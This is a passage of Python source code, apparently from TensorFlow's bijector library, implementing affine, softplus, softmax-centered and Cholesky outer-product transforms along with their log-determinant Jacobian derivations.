we use the matrix determinant lemma: det(Tril + V D V.T) = det(C) det(D) det(M) where C is defined as in `_inverse`, ie, C = inv(D) + V.T inv(M) V. See: https://en.wikipedia.org/wiki/Matrix_determinant_lemma Returns: log_abs_det: `Tensor`. """ log_det_c = math_ops.log(math_ops.abs( linalg_ops.matrix_determinant(self._woodbury_sandwiched_term()))) # Reduction is ok because we always prepad inputs to this class. log_det_m = math_ops.reduce_sum(math_ops.log(math_ops.abs( array_ops.matrix_diag_part(self._m))), reduction_indices=[-1]) return log_det_c + 2. * self._d.sqrt_log_abs_det() + log_det_m def _woodbury_sandwiched_term(self): """Computes the sandwiched term in the Woodbury identity. Computes the "`C`" in the the identity: inv(M + V D V.T) = inv(M) - inv(M) V inv(C) V.T inv(M) where, C = inv(D) + V.T inv(M) V. See: https://en.wikipedia.org/wiki/Woodbury_matrix_identity Returns: woodbury_sandwich_term: A `Tensor` to be used like `C`, above. """ minv_v = linalg_ops.matrix_triangular_solve(self._m, self._v) vt_minv_v = math_ops.matmul(self._v, minv_v, adjoint_a=True) return self._d_inv.add_to_tensor(vt_minv_v) class Affine(Bijector): # pylint: disable=line-too-long """Bijector which computes `Y = g(X; shift, scale) = matmul(scale, X) + shift` where `scale = c * I + diag(D1) + tril(L) + V @ diag(D2) @ V.T`. Write `A @ X` for `matmul(A, X)`. In TF parlance, the `scale` term is logically equivalent to: ```python scale = ( scale_identity_multiplier * tf.diag(tf.ones(d)) + tf.diag(scale_diag) + scale_tril + scale_perturb_factor @ diag(scale_perturb_diag) @ tf.transpose([scale_perturb_factor]) ) ``` The `scale` term is applied without necessarily materializing constituent matrices, i.e., the matmul is [matrix-free]( https://en.wikipedia.org/wiki/Matrix-free_methods) when possible. Examples: ```python # Y = X b = Affine() # Y = X + shift b = Affine(shift=[1., 2, 3]) # Y = 2 * I @ X.T + shift b = Affine(shift=[1., 2, 3], scale_identity_multiplier=2.) # Y = tf.diag(d1) @ X.T + shift b = Affine(shift=[1., 2, 3], scale_diag=[-1., 2, 1]) # Implicitly 3x3. # Y = (I + v * v.T) @ X.T + shift b = Affine(shift=[1., 2, 3], scale_perturb_factor=[[1., 0], [0, 1], [1, 1]]) # Y = (diag(d1) + v * diag(d2) * v.T) @ X.T + shift b = Affine(shift=[1., 2, 3], scale_diag=[1., 3, 3], # Implicitly 3x3. scale_perturb_diag=[2., 1], # Implicitly 2x2. scale_perturb_factor=[[1., 0], [0, 1], [1, 1]]) ``` """ # pylint: enable=line-too-long def __init__(self, shift=None, scale_identity_multiplier=None, scale_diag=None, scale_tril=None, scale_perturb_factor=None, scale_perturb_diag=None, event_ndims=1, validate_args=False, name="affine"): """Instantiates the `Affine` bijector. This `Bijector` is initialized with `shift` `Tensor` and `scale` arguments, giving the forward operation: ```none Y = g(X) = scale @ X + shift ``` where the `scale` term is logically equivalent to: ```python scale = ( scale_identity_multiplier * tf.diag(tf.ones(d)) + tf.diag(scale_diag) + scale_tril + scale_perturb_factor @ diag(scale_perturb_diag) @ tf.transpose([scale_perturb_factor]) ) ``` If none of `scale_identity_multiplier`, `scale_diag`, or `scale_tril` are specified then `scale += IdentityMatrix`. Otherwise specifying a `scale` argument has the semantics of `scale += Expand(arg)`, i.e., `scale_diag != None` means `scale += tf.diag(scale_diag)`. Args: shift: Numeric `Tensor`. If this is set to `None`, no shift is applied. scale_identity_multiplier: floating point rank 0 `Tensor` representing a scaling done to the identity matrix. When `scale_identity_multiplier = scale_diag=scale_tril = None` then `scale += IdentityMatrix`. Otherwise no scaled-identity-matrix is added to `scale`. scale_diag: Numeric `Tensor` representing the diagonal matrix. `scale_diag` has shape [N1, N2, ... k], which represents a k x k diagonal matrix. When `None` no diagonal term is added to `scale`. scale_tril: Numeric `Tensor` representing the diagonal matrix. `scale_diag` has shape [N1, N2, ... k, k], which represents a k x k lower triangular matrix. When `None` no `scale_tril` term is added to `scale`. scale_perturb_factor: Numeric `Tensor` representing factor matrix with last two dimensions of shape `(k, r)`. When `None`, no rank-r update is added to `scale`. scale_perturb_diag: Numeric `Tensor` representing the diagonal matrix. `scale_perturb_diag` has shape [N1, N2, ... r], which represents an r x r Diagonal matrix. When `None` low rank updates will take the form `scale_perturb_factor * scale_perturb_factor.T`. event_ndims: Scalar `int32` `Tensor` indicating the number of dimensions associated with a particular draw from the distribution. Must be 0 or 1. validate_args: `Boolean` indicating whether arguments should be checked for correctness. name: `String` name given to ops managed by this object. Raises: ValueError: if `perturb_diag` is specified but not `perturb_factor`. TypeError: if `shift` has different `dtype` from `scale` arguments. """ self._graph_parents = [] self._name = name self._validate_args = validate_args # Ambiguous definition of low rank update. if scale_perturb_diag is not None and scale_perturb_factor is None: raise ValueError("When scale_perturb_diag is specified, " "scale_perturb_factor must be specified.") # Special case, only handling a scaled identity matrix. We don't know its # dimensions, so this is special cased. # We don't check identity_multiplier, since below we set it to 1. if all # other scale args are None. self._is_only_identity_multiplier = (scale_tril is None and scale_diag is None and scale_perturb_factor is None) # When no args are specified, pretend the scale matrix is the identity # matrix. if self._is_only_identity_multiplier and scale_identity_multiplier is None: scale_identity_multiplier = 1. with self._name_scope("init", values=[ shift, scale_identity_multiplier, scale_diag, scale_tril, scale_perturb_diag, scale_perturb_factor, event_ndims]): event_ndims = ops.convert_to_tensor(event_ndims, name="event_ndims") if validate_args: is_less_than_two = check_ops.assert_less( event_ndims, 2, message="event_ndims must be 0 or 1") event_ndims = control_flow_ops.with_dependencies( [is_less_than_two], event_ndims) self._shift = _as_tensor(shift, "shift") # self._create_scale_operator returns an OperatorPD in all cases except if # self._is_only_identity_multiplier; in which case it returns a scalar # Tensor. self._scale = self._create_scale_operator( identity_multiplier=scale_identity_multiplier, diag=scale_diag, tril=scale_tril, perturb_diag=scale_perturb_diag, perturb_factor=scale_perturb_factor, event_ndims=event_ndims, validate_args=validate_args) if (self._shift is not None and self._shift.dtype.base_dtype != self._scale.dtype.base_dtype): raise TypeError("shift.dtype({}) does not match scale.dtype({})".format( self._shift.dtype, self._scale.dtype)) super(Affine, self).__init__( batch_ndims=self._infer_batch_ndims(), event_ndims=event_ndims, graph_parents=( [event_ndims] + [self._scale] if contrib_framework.is_tensor(self._scale) else self._scale.inputs + [self._shift] if self._shift is not None else []), is_constant_jacobian=True, validate_args=validate_args, name=name) def _create_scale_operator(self, identity_multiplier, diag, tril, perturb_diag, perturb_factor, event_ndims, validate_args): """Construct `scale` from various components. Args: identity_multiplier: floating point rank 0 `Tensor` representing a scaling done to the identity matrix. diag: Numeric `Tensor` representing the diagonal matrix. `scale_diag` has shape [N1, N2, ... k], which represents a k x k diagonal matrix. tril: Numeric `Tensor` representing the diagonal matrix. `scale_tril` has shape [N1, N2, ... k], which represents a k x k lower triangular matrix. perturb_diag: Numeric `Tensor` representing the diagonal matrix of the low rank update. perturb_factor: Numeric `Tensor` representing factor matrix. event_ndims: Scalar `int32` `Tensor` indicating the number of dimensions associated with a particular draw from the distribution. Must be 0 or 1 validate_args: `Boolean` indicating whether arguments should be checked for correctness. Returns: scale and batch_ndims. In the case of scaling by a constant, scale is a floating point `Tensor`. Otherwise, scale is an `OperatorPD`. Raises: ValueError: if all of `tril`, `diag` and `identity_multiplier` are `None`. """ identity_multiplier = _as_tensor(identity_multiplier, "identity_multiplier") diag = _as_tensor(diag, "diag") tril = _as_tensor(tril, "tril") perturb_diag = _as_tensor(perturb_diag, "perturb_diag") perturb_factor = _as_tensor(perturb_factor, "perturb_factor") identity_multiplier = self._maybe_validate_identity_multiplier( identity_multiplier, validate_args) if perturb_factor is not None: perturb_factor = self._process_matrix( perturb_factor, min_rank=2, event_ndims=event_ndims) if perturb_diag is not None: perturb_diag = self._process_matrix( perturb_diag, min_rank=1, event_ndims=event_ndims) # The following if-statments are ordered by increasingly stronger # assumptions in the base matrix, i.e., we process in the order: # TriL, Diag, Identity. if tril is not None: tril = self._preprocess_tril( identity_multiplier, diag, tril, event_ndims) if perturb_factor is None: return operator_pd_cholesky.OperatorPDCholesky( tril, verify_pd=validate_args) return _TriLPlusVDVTLightweightOperatorPD( tril=tril, v=perturb_factor, diag=perturb_diag, validate_args=validate_args) if diag is not None: diag = self._preprocess_diag(identity_multiplier, diag, event_ndims) if perturb_factor is None: return operator_pd_diag.OperatorPDSqrtDiag( diag, verify_pd=validate_args) return operator_pd_vdvt_update.OperatorPDSqrtVDVTUpdate( operator=operator_pd_diag.OperatorPDDiag( diag, verify_pd=validate_args), v=perturb_factor, diag=perturb_diag, verify_pd=validate_args) if identity_multiplier is not None: if perturb_factor is None: return identity_multiplier # Infer the shape from the V and D. v_shape = array_ops.shape(perturb_factor) identity_shape = array_ops.concat_v2((v_shape[:-1], (v_shape[-2],)), 0) scaled_identity = operator_pd_identity.OperatorPDIdentity( identity_shape, perturb_factor.dtype.base_dtype, scale=identity_multiplier, verify_pd=validate_args) return operator_pd_vdvt_update.OperatorPDSqrtVDVTUpdate( operator=scaled_identity, v=perturb_factor, diag=perturb_diag, verify_pd=validate_args) raise ValueError("One of tril, diag and/or identity_multiplier must be " "specified.") def _maybe_validate_identity_multiplier(self, identity_multiplier, validate_args): """Check that the init arg `identity_multiplier` is valid.""" if identity_multiplier is None or not validate_args: return identity_multiplier if validate_args: identity_multiplier = control_flow_ops.with_dependencies( [check_ops.assert_positive(identity_multiplier)], identity_multiplier) return identity_multiplier def _preprocess_tril(self, identity_multiplier, diag, tril, event_ndims): """Helper to preprocess a lower triangular matrix.""" tril = array_ops.matrix_band_part(tril, -1, 0) # Zero out TriU. if identity_multiplier is None and diag is None: return self._process_matrix(tril, min_rank=2, event_ndims=event_ndims) new_diag = array_ops.matrix_diag_part(tril) if identity_multiplier is not None: new_diag += identity_multiplier if diag is not None: new_diag += diag tril = array_ops.matrix_set_diag(tril, new_diag) return self._process_matrix(tril, min_rank=2, event_ndims=event_ndims) def _preprocess_diag(self, identity_multiplier, diag, event_ndims): """Helper to preprocess a diagonal matrix.""" if identity_multiplier is not None: diag += identity_multiplier return self._process_matrix(diag, min_rank=1, event_ndims=event_ndims) def _process_matrix(self, matrix, min_rank, event_ndims): """Helper to __init__ which gets matrix in batch-ready form.""" # Pad the matrix so that matmul works in the case of a matrix and vector # input. Keep track if the matrix was padded, to distinguish between a # rank 3 tensor and a padded rank 2 tensor. # TODO(srvasude): Remove side-effects from functions. Its currently unbroken # but error-prone since the function call order may change in the future. self._rank_two_event_ndims_one = math_ops.logical_and( math_ops.equal(array_ops.rank(matrix), min_rank), math_ops.equal(event_ndims, 1)) left = array_ops.where(self._rank_two_event_ndims_one, 1, 0) pad = array_ops.concat_v2([ array_ops.ones([left], dtype=dtypes.int32), array_ops.shape(matrix)], 0) return array_ops.reshape(matrix, pad) def _infer_batch_ndims(self): """Return batch_ndims.""" if self._is_only_identity_multiplier: return 0 # The real batch dims is one less when we pad in the case of event_ndims = # 1, and the rank of the underlying scale being 2. This allows us to have # non-negative sample dims. return (self._scale.rank() - 2 - array_ops.where(self._rank_two_event_ndims_one, 1, 0)) @property def shift(self): return self._shift @property def scale(self): # TODO(srvasude): Remove this exception once TriLPlusVDVT is properly # implemented. if isinstance(self._scale, _TriLPlusVDVTLightweightOperatorPD): raise NotImplementedError("Cannot access scale when Tril+VDV.T.") return self._scale def _forward(self, x): y = x if self._is_only_identity_multiplier: y *= self._scale if self.shift is not None: return y + self.shift return y y, sample_shape = self.shaper.make_batch_of_event_sample_matrices(y) y = self._scale.sqrt_matmul(y) y = self.shaper.undo_make_batch_of_event_sample_matrices(y, sample_shape) if self.shift is not None: return y + self.shift return y def _inverse(self, y): x = y if self.shift is not None: x -= self.shift if self._is_only_identity_multiplier: return x / self._scale x, sample_shape = self.shaper.make_batch_of_event_sample_matrices(x) x = self._scale.sqrt_solve(x) x = self.shaper.undo_make_batch_of_event_sample_matrices(x, sample_shape) return x def _inverse_log_det_jacobian(self, y): return -self._forward_log_det_jacobian(y) def _forward_log_det_jacobian(self, x): if self._is_only_identity_multiplier: # TODO(jvdillon): We don't pad in this case and instead let the fldj be # applied via broadcast. d = math_ops.cast(array_ops.shape(x)[-1], dtype=self._scale.dtype) return math_ops.log(math_ops.abs(self._scale)) * array_ops.where( math_ops.equal(self.shaper.event_ndims, 0), 1., d) fldj = self._scale.sqrt_log_abs_det() # We need to squeeze off the padded dimension. start = array_ops.where(self._rank_two_event_ndims_one, 1, 0) return array_ops.reshape(fldj, array_ops.shape(fldj)[start:]) class AffineLinearOperator(Bijector): """Bijector which computes `Y = g(X; shift, scale) = scale @ X.T + shift`. `shift` is a numeric `Tensor` and `scale` is a `LinearOperator`. If `X` is a scalar then the forward transformation is: `scale * X + shift` where `*` denotes the scalar product. Note: we don't always simply transpose `X` (but write it this way for brevity). Actually the input `X` undergoes the following transformation before being premultiplied by `scale`: 1. If there are no sample dims, we call `X = tf.expand_dims(X, 0)`, i.e., `new_sample_shape = [1]`. Otherwise do nothing. 2. The sample shape is flattened to have one dimension, i.e., `new_sample_shape = [n]` where `n = tf.reduce_prod(old_sample_shape)`. 3. The sample dim is cyclically rotated left by 1, i.e., `new_shape = [B1,...,Bb, k, n]` where `n` is as above, `k` is the event_shape, and `B1,...,Bb` are the batch shapes for each of `b` batch dimensions. (For more details see `shape.make_batch_of_event_sample_matrices`.) The result of the above transformation is that `X` can be regarded as a batch of matrices where each column is a draw from the distribution. After premultiplying by `scale`, we take the inverse of this procedure. The input `Y` also undergoes the same transformation before/after premultiplying by `inv(scale)`. Example Use: ```python linalg = tf.contrib.linalg x = [1., 2, 3] shift = [-1., 0., 1] diag = [1., 2, 3] scale = linalg.LinearOperatorDiag(diag) affine = AffineLinearOperator(shift, scale) # In this case, `forward` is equivalent to: # diag * scale + shift y = affine.forward(x) # [0., 4, 10] shift = [2., 3, 1] tril = [[1., 0, 0], [2, 1, 0], [3, 2, 1]] scale = linalg.LinearOperatorTriL(tril) affine = AffineLinearOperator(shift, scale) # In this case, `forward` is equivalent to: # np.squeeze(np.matmul(tril, np.expand_dims(x, -1)), -1) + shift y = affine.forward(x) # [3., 7, 11] ``` """ def __init__(self, shift=None, scale=None, event_ndims=1, validate_args=False, name="affine_linear_operator"): """Instantiates the `AffineLinearOperator` bijector. Args: shift: Numeric `Tensor`. scale: Subclass of `LinearOperator`. Represents the (batch) positive definite matrix `M` in `R^{k x k}`. event_ndims: Scalar `integer` `Tensor` indicating the number of dimensions associated with a particular draw from the distribution. Must be 0 or 1. validate_args: `Boolean` indicating whether arguments should be checked for correctness. name: `String` name given to ops managed by this object. Raises: ValueError: if `event_ndims` is not 0 or 1. TypeError: if `scale` is not a `LinearOperator`. TypeError: if `shift.dtype` does not match `scale.dtype`. ValueError: if not `scale.is_non_singular`. """ self._graph_parents = [] self._name = name self._validate_args = validate_args graph_parents = [] with self._name_scope("init", values=[shift]): event_ndims = ops.convert_to_tensor(event_ndims, name="event_ndims") if tensor_util.constant_value(event_ndims) is not None: event_ndims = tensor_util.constant_value(event_ndims) if event_ndims not in (0, 1): raise ValueError("event_ndims({}) was not 0 or 1".format(event_ndims)) else: if validate_args: # Shape tool will catch if event_ndims is negative. event_ndims = control_flow_ops.with_dependencies( [check_ops.assert_less( event_ndims, 2, message="event_ndims must be 0 or 1")], event_ndims) graph_parents += [event_ndims] if shift is not None: shift = ops.convert_to_tensor(shift, name="shift") graph_parents += [shift] self._shift = shift if scale is not None: if (shift is not None and shift.dtype.base_dtype != scale.dtype.base_dtype): raise TypeError( "shift.dtype({}) is incompatible with scale.dtype({}).".format( shift.dtype, scale.dtype)) if not isinstance(scale, linear_operator.LinearOperator): raise TypeError("scale is not an instance of tf.LinearOperator") if validate_args and not scale.is_non_singular: raise ValueError("Scale matrix must be non-singular.") graph_parents += scale.graph_parents if scale.tensor_rank is not None: batch_ndims = scale.tensor_rank - 2 else: batch_ndims = scale.tensor_rank_dynamic() - 2 graph_parents += [batch_ndims] else: batch_ndims = 0 # We won't need shape inference when scale is None. self._scale = scale super(AffineLinearOperator, self).__init__( batch_ndims=batch_ndims, event_ndims=event_ndims, graph_parents=graph_parents, is_constant_jacobian=True, validate_args=validate_args, name=name) @property def shift(self): """The `shift` `Tensor` in `Y = scale @ X.T + shift`.""" return self._shift @property def scale(self): """The `scale` `LinearOperator` in `Y = scale @ X.T + shift`.""" return self._scale def _forward(self, x): y = x if self.scale is not None: y, sample_shape = self.shaper.make_batch_of_event_sample_matrices( y, expand_batch_dim=False) with ops.control_dependencies([self.scale.assert_non_singular()] if self.validate_args else []): y = self.scale.apply(y) y = self.shaper.undo_make_batch_of_event_sample_matrices( y, sample_shape, expand_batch_dim=False) if self.shift is not None: y += self.shift return y def _inverse(self, y): x = y if self.shift is not None: x -= self.shift if self.scale is not None: x, sample_shape = self.shaper.make_batch_of_event_sample_matrices( x, expand_batch_dim=False) # Solve fails if the op is singular so we may safely skip this assertion. x = self.scale.solve(x) x = self.shaper.undo_make_batch_of_event_sample_matrices( x, sample_shape, expand_batch_dim=False) return x def _inverse_log_det_jacobian(self, y): return -self._forward_log_det_jacobian(y) def _forward_log_det_jacobian(self, x): # pylint: disable=unused-argument if self.scale is None: return constant_op.constant(0, dtype=x.dtype.base_dtype) with ops.control_dependencies([self.scale.assert_non_singular()] if self.validate_args else []): return self.scale.log_abs_determinant() class Softplus(Bijector): """Bijector which computes `Y = g(X) = Log[1 + exp(X)]`. The softplus `Bijector` has the following two useful properties: * The domain is the positive real numbers * `softplus(x) approx x`, for large `x`, so it does not overflow as easily as the `Exp` `Bijector`. Example Use: ```python # Create the Y=g(X)=softplus(X) transform which works only on Tensors with 1 # batch ndim and 2 event ndims (i.e., vector of matrices). softplus = Softplus(batch_ndims=1, event_ndims=2) x = [[[1., 2], [3, 4]], [[5, 6], [7, 8]]] log(1 + exp(x)) == softplus.forward(x) log(exp(x) - 1) == softplus.inverse(x) ``` Note: log(.) and exp(.) are applied element-wise but the Jacobian is a reduction over the event space. """ def __init__(self, event_ndims=0, validate_args=False, name="softplus"): super(Softplus, self).__init__( batch_ndims=0, event_ndims=event_ndims, validate_args=validate_args, name=name) def _forward(self, x): return nn_ops.softplus(x) def _inverse_and_inverse_log_det_jacobian(self, y): # The most stable inverse of softplus is not the most obvious one. # y = softplus(x) = Log[1 + exp{x}], (which means y > 0). # ==> exp{y} = 1 + exp{x} (1) # ==> x = Log[exp{y} - 1] (2) # = Log[(exp{y} - 1) / exp{y}] + Log[exp{y}] # = Log[(1 - exp{-y}) / 1] + Log[exp{y}] # = Log[1 - exp{-y}] + y (3) # (2) is the "obvious" inverse, but (3) is more stable than (2) for large y. # For small y (e.g. y = 1e-10), (3) will become -inf since 1 - exp{-y} will # be zero. To fix this, we use 1 - exp{-y} approx y for small y > 0. # # Stable inverse log det jacobian. # Y = Log[1 + exp{X}] ==> X = Log[exp{Y} - 1] # ==> dX/dY = exp{Y} / (exp{Y} - 1) # = 1 / (1 - exp{-Y}), # which is the most stable for large Y > 0. For small Y, we use # 1 - exp{-Y} approx Y. if self.shaper is None: raise ValueError("Jacobian cannot be computed with unknown event_ndims") _, _, event_dims = self.shaper.get_dims(y) log_one_minus_exp_neg = math_ops.log(-_expm1(-y)) x = y + log_one_minus_exp_neg ildj = -math_ops.reduce_sum( log_one_minus_exp_neg, reduction_indices=event_dims) return x, ildj def _forward_log_det_jacobian(self, x): # pylint: disable=unused-argument if self.shaper is None: raise ValueError("Jacobian cannot be computed with unknown event_ndims") _, _, event_dims = self.shaper.get_dims(x) return -math_ops.reduce_sum( nn_ops.softplus(-x), reduction_indices=event_dims) class SoftmaxCentered(Bijector): """Bijector which computes `Y = g(X) = exp([X 0]) / sum(exp([X 0]))`. To implement [softmax](https://en.wikipedia.org/wiki/Softmax_function) as a bijection, the forward transformation appends a value to the input and the inverse removes this coordinate. The appended coordinate represents a pivot, e.g., `softmax(x) = exp(x-c) / sum(exp(x-c))` where `c` is the implicit last coordinate. Because we append a coordinate, this bijector only supports `event_ndim in [0, 1]`, i.e., scalars and vectors. Example Use: ```python bijector.SoftmaxCentered(event_ndims=1).forward(tf.log([2, 3, 4])) # Result: [0.2, 0.3, 0.4, 0.1] # Extra result: 0.1 bijector.SoftmaxCentered(event_ndims=1).inverse([0.2, 0.3, 0.4, 0.1]) # Result: tf.log([2, 3, 4]) # Extra coordinate removed. ``` At first blush it may seem like the [Invariance of domain]( https://en.wikipedia.org/wiki/Invariance_of_domain) theorem implies this implementation is not a bijection. However, the appended dimension makes the (forward) image non-open and the theorem does not directly apply. """ def __init__(self, event_ndims=0, validate_args=False, name="softmax_centered"): self._graph_parents = [] self._name = name with self._name_scope("init", values=[event_ndims]): event_ndims = ops.convert_to_tensor(event_ndims, name="event_ndims") event_ndims = tensor_util.constant_value(event_ndims) if event_ndims is None or event_ndims not in [0, 1]: raise ValueError("`event_ndims` must be a TF constant which is 0 or 1") self._static_event_ndims = event_ndims super(SoftmaxCentered, self).__init__( batch_ndims=0, # We'll regard all non-event dims as sample dims. event_ndims=event_ndims, validate_args=validate_args, name=name) def _get_forward_event_shape(self, input_shape): if input_shape.ndims is None: return input_shape if input_shape.ndims != self._static_event_ndims: raise ValueError("input_shape.dims = %d != %d" % (input_shape.ndims, self._static_event_ndims)) if input_shape.ndims == 0: return tensor_shape.TensorShape([2]) if input_shape.ndims == 1: return tensor_shape.TensorShape(input_shape[0] + 1) # Unreachable code: raise ValueError("event_ndims = %d must be 0 or 1" % input_shape.ndims) def _forward_event_shape(self, input_shape): ndims = array_ops.shape(input_shape) if self.validate_args: # It is not possible for a negative shape so we need only check <= 1. is_zero_or_one = check_ops.assert_equal( ndims, 0 if self._static_event_ndims == 0 else 1, message="event_ndims must be 0 or 1") ndims = control_flow_ops.with_dependencies([is_zero_or_one], ndims) if self._static_event_ndims == 0: return ops.convert_to_tensor( [2], dtype=dtypes.int32, name="output_shape") return input_shape + 1 def _get_inverse_event_shape(self, output_shape): if output_shape.ndims is None: return output_shape if output_shape.ndims != 1: raise ValueError("output_shape.ndims = %d != 1" % output_shape.ndims) if self._static_event_ndims == 0: return tensor_shape.TensorShape([]) return tensor_shape.TensorShape(output_shape[0] - 1) def _inverse_event_shape(self, output_shape): ndims = array_ops.shape(output_shape)[0] if self.validate_args: # It is not possible for a negative shape so we need only check <= 1. is_one = check_ops.assert_equal( ndims, 1, message="event_ndims must be 1") ndims = control_flow_ops.with_dependencies([is_one], ndims) if self._static_event_ndims == 0: return ops.convert_to_tensor([], dtype=dtypes.int32, name="output_shape") return array_ops.expand_dims(output_shape[0] - 1, dim=0) def _forward(self, x): # Pad the last dim with a zeros vector. We need this because it lets us # infer the scale in the inverse function. y = array_ops.expand_dims(x, dim=-1) if self._static_event_ndims == 0 else x ndims = (y.get_shape().ndims if y.get_shape().ndims is not None else array_ops.rank(y)) y = array_ops.pad(y, paddings=array_ops.concat_v2( (array_ops.zeros( (ndims - 1, 2), dtype=dtypes.int32), [[0, 1]]), 0)) # Set shape hints. if x.get_shape().ndims is not None: shape = x.get_shape().as_list() if self._static_event_ndims == 0: shape += [2] elif shape[-1] is not None: shape[-1] += 1 shape = tensor_shape.TensorShape(shape) y.get_shape().assert_is_compatible_with(shape) y.set_shape(shape) # Since we only support event_ndims in [0, 1] and we do padding, we always # reduce over the last dimension, i.e., dim=-1 (which is the default). return nn_ops.softmax(y) def _inverse(self, y): # To derive the inverse mapping note that: # y[i] = exp(x[i]) / normalization # and # y[end] = 1 / normalization. # Thus: # x[i] = log(exp(x[i])) - log(y[end]) - log(normalization) # = log(exp(x[i])/normalization) - log(y[end]) # = log(y[i]) - log(y[end]) shape = (np.asarray(y.get_shape().as_list(), dtype=np.int32) if y.get_shape().is_fully_defined() else array_ops.shape(y, name="shape")) ndims = y.get_shape().ndims or math_ops.rank(y, name="ndims") # Do this first to make sure CSE catches that it'll happen again in # _inverse_log_det_jacobian. x = math_ops.log(y) # We now extract the last coordinate of the rightmost dimension. # Our trick is to slice from [0,0,...,shape[-1]-1] to shape[:-1]+[1]. begin = array_ops.one_hot(indices=ndims-1, depth=ndims, on_value=shape[-1]-np.array(1, dtype=shape.dtype), dtype=shape.dtype) size = array_ops.concat_v2( (shape[:-1], np.asarray( [1], dtype=shape.dtype)), 0) log_normalization = -array_ops.strided_slice(x, begin, begin + size) # Here we slice out all but the last coordinate; see above for idea. begin = array_ops.zeros_like(shape) size = array_ops.concat_v2((shape[:-1], [shape[-1] - 1]), 0) x = array_ops.strided_slice(x, begin, begin + size) x += log_normalization if self._static_event_ndims == 0: x = array_ops.squeeze(x, squeeze_dims=[ndims-1]) # Set shape hints. if y.get_shape().ndims is not None: shape = y.get_shape().as_list() if self._static_event_ndims == 0: shape = shape[:-1] elif shape[-1] is not None: shape[-1] -= 1 shape = tensor_shape.TensorShape(shape) x.get_shape().assert_is_compatible_with(shape) x.set_shape(shape) return x def _inverse_log_det_jacobian(self, y): # WLOG, consider the vector case: # x = log(y[:-1]) - log(y[-1]) # where, # y[-1] = 1 - sum(y[:-1]). # We have: # det{ dX/dY } = det{ diag(1 ./ y[:-1]) + 1 / y[-1] } # = det{ inv{ diag(y[:-1]) - y[:-1]' y[:-1] } } (1) # = 1 / det{ diag(y[:-1]) - y[:-1]' y[:-1] } # = 1 / { (1 + y[:-1]' inv(diag(y[:-1])) y[:-1]) * # det(diag(y[:-1])) } (2) # = 1 / { y[-1] prod(y[:-1]) } # = 1 / prod(y) # (1) - https://en.wikipedia.org/wiki/Sherman%E2%80%93Morrison_formula # or by noting that det{ dX/dY } = 1 / det{ dY/dX } from Bijector # docstring "Tip". # (2) - https://en.wikipedia.org/wiki/Matrix_determinant_lemma return -math_ops.reduce_sum(math_ops.log(y), reduction_indices=-1) def _forward_log_det_jacobian(self, x): if self._static_event_ndims == 0: return x - 2. * nn_ops.softplus(x) else: # This code is similar to nn_ops.log_softmax but different because we have # an implicit zero column to handle. I.e., instead of: # reduce_sum(logits - reduce_sum(exp(logits), dim)) # we must do: # log_normalization = 1 + reduce_sum(exp(logits)) # -log_normalization + reduce_sum(logits - log_normalization) log_normalization = nn_ops.softplus( math_ops.reduce_logsumexp(x, reduction_indices=-1, keep_dims=True)) fldj = (-log_normalization + math_ops.reduce_sum(x - log_normalization, reduction_indices=-1, keep_dims=True)) return array_ops.squeeze(fldj, squeeze_dims=-1) class SigmoidCentered(SoftmaxCentered): """Bijector which computes Y = g(X) = exp([X 0]) / (1 + exp(-X)). Equivalent to: `bijector.SoftmaxCentered(event_ndims=0)`. See `bijector.SoftmaxCentered` for more details. """ def __init__(self, validate_args=False, name="sigmoid_centered"): super(SigmoidCentered, self).__init__( validate_args=validate_args, name=name) class CholeskyOuterProduct(Bijector): # pylint: disable=line-too-long """Bijector which computes Y = g(X) = X X.T where X is a lower-triangular, positive-diagonal matrix. `event_ndims` must be 0 or 2, i.e., scalar or matrix. Note: the upper-triangular part of X is ignored (whether or not its zero). Examples: ```python bijector.CholeskyOuterProduct(event_ndims=2).forward(x=[[1., 0], [2, 1]]) # Result: [[1, 1], [1, 5]], i.e., x x.T bijector.SoftmaxCentered(event_ndims=2).inverse(y=[[1., 1], [1, 5]]) # Result: [[1, 0], [2, 1]], i.e., chol(y). ``` """ # pylint: enable=line-too-long def __init__(self, event_ndims=2, validate_args=False, name="cholesky_outer_product"): """Instantiates the `CholeskyOuterProduct` bijector. Args: event_ndims: `constant` `int32` scalar `Tensor` indicating the number of dimensions associated with a particular draw from the distribution. Must be 0 or 2. validate_args: `Boolean` indicating whether arguments should be checked for correctness. name: `String` name given to ops managed by this object. Raises: ValueError: if event_ndims is neither 0 or 2. """ self._graph_parents = [] self._name = name with self._name_scope("init", values=[event_ndims]): event_ndims = ops.convert_to_tensor(event_ndims, name="event_ndims") event_ndims = tensor_util.constant_value(event_ndims) if event_ndims is None or event_ndims not in [0, 2]: raise ValueError("`event_ndims` must be a TF constant which is 0 or 2") self._static_event_ndims = event_ndims super(CholeskyOuterProduct, self).__init__( validate_args=validate_args, name=name) def _forward(self, x): if self._static_event_ndims == 0: return math_ops.square(x) if self.validate_args: is_matrix = check_ops.assert_rank_at_least(x, 2) shape = array_ops.shape(x) is_square = check_ops.assert_equal(shape[-2], shape[-1]) x = control_flow_ops.with_dependencies([is_matrix, is_square], x) # For safety, explicitly zero-out the upper triangular part. x = array_ops.matrix_band_part(x, -1, 0) return math_ops.matmul(x, x, adjoint_b=True) def _inverse_and_inverse_log_det_jacobian(self, y): x = (math_ops.sqrt(y) if self._static_event_ndims == 0 else linalg_ops.cholesky(y)) return x, -self._forward_log_det_jacobian(x) def _forward_log_det_jacobian(self, x): # Let Y be a symmetric, positive definite matrix and write: # Y = X X.T # where X is lower-triangular. # # Observe that, # dY[i,j]/dX[a,b] # = d/dX[a,b] { X[i,:] X[j,:] } # = sum_{d=1}^p { I[i=a] I[d=b] X[j,d] + I[j=a] I[d=b] X[i,d] } # # To compute the Jacobian dX/dY we must represent X,Y as vectors. Since Y is # symmetric and X is lower-triangular, we need vectors of dimension: # d = p (p + 1) / 2 # where X, Y are p x p matrices, p > 0. We use a row-major mapping, i.e., # k = { i (i + 1) / 2 + j i>=j # { undef i<j # and assume zero-based indexes. When k is undef, the element is dropped. # Example: # j k # 0 1 2 3 / # 0 [ 0 . . . ] # i 1 [ 1 2 . . ] # 2 [ 3 4 5 . ] # 3 [ 6 7 8 9 ] # Write vec[.] to indicate transforming a matrix to vector via k(i,j). (With # slight abuse: k(i,j)=undef means the element is dropped.) # # We now show d vec[Y] / d vec[X] is lower triangular. Assuming both are # defined, observe that k(i,j) < k(a,b) iff (1) i<a or (2) i=a and j<b. # In both cases dvec[Y]/dvec[X]@[k(i,j),k(a,b)] = 0 since: # (1) j<=i<a thus i,j!=a. # (2) i=a>j thus i,j!=a. # # Since the Jacobian is lower-triangular, we need only compute the product # of diagonal 